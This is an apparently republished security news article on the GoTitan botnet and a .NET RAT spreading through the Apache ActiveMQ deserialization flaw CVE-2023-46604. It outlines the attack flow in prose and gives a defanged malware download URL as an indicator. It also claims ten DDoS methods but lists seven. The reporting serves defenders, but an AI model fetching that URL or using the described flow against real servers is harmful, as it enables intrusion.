GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability


Attackers are exploiting the recently discovered critical security vulnerability tracked as (CVE-2023-46604) affecting Apache ActiveMQ to disseminate the Golang-based botnet GoTitan and the.NET application “PrCtrl Rat,” which has the ability to be remotely controlled.

Any Operating System using Apache Active MQ versions earlier than 5.15.16, 5.16.7, 5.17.6, and 5.18.3 was susceptible to this critical vulnerability.

An advisory was released by Apache in October addressing this vulnerability (CVE-2023-46604) that pertains to the deserialization of untrusted data in Apache. 

Due to the high risk and potential consequences of this vulnerability, CISA added CVE-2023-46604 to its list of known exploits, or KEV Catalog, on November 2.

Document

Protect Your Storage With SafeGuard

StorageGuard scans, detects, and fixes security misconfigurations and vulnerabilities across hundreds of storage and backup devices.


GoTitan Botnet – Ongoing Exploitation on Apache ActiveMQ

Generally, in this case, the attacker causes the system to unmarshal a class under their control by sending a crafted packet.

It is then necessary for a predefined XML file to be hosted externally for the susceptible server to be prompted to retrieve and load a class configuration XML file from the given remote URL.

The arbitrary code meant to run on the infected system is defined in the malicious XML file. Attackers can execute code on the remote, susceptible server by setting parameters like “cmd” or “bash.”

Malicious XML files
Malicious XML files

According to Fortinet researchers, this month, GoTitan, a new botnet, was identified, which may be obtained from the malicious URL “hxxp://91.92.242.14/main-linux-amd64s” and is written in the Go programming language. The malware runs certain checks prior to execution, and the attacker only offers binaries for x64 architectures.

Additionally, a file called “c.log” is created, containing the program status and execution time. It appears that this file is a developer’s debug log, indicating that GoTitan is still in its early stages of development.

Subsequently, it obtains the C2 IP address and crucial facts about the exploited endpoint, such as CPU details, memory, and architecture.

C2 traffic session for GoTitan
C2 traffic session for GoTitan

“GoTitan communicates with its C2 server by sending “xFExFE” as a heartbeat signal and waiting for further instructions. When it receives a command, it passes it to a function named “handle_socket_func2” that determines an attack method,” researchers explain.

Distributed denial-of-service (DDoS) attacks can be launched using 10 distinct methods by GoTitan: TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.

Researchers also found more well-known malware and tools in use, like Sliver, Kinsing, and Ddostf.

System updates, patching, and continuous monitoring of security advisories are essential to reduce the danger of exploitation.

Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.



Source link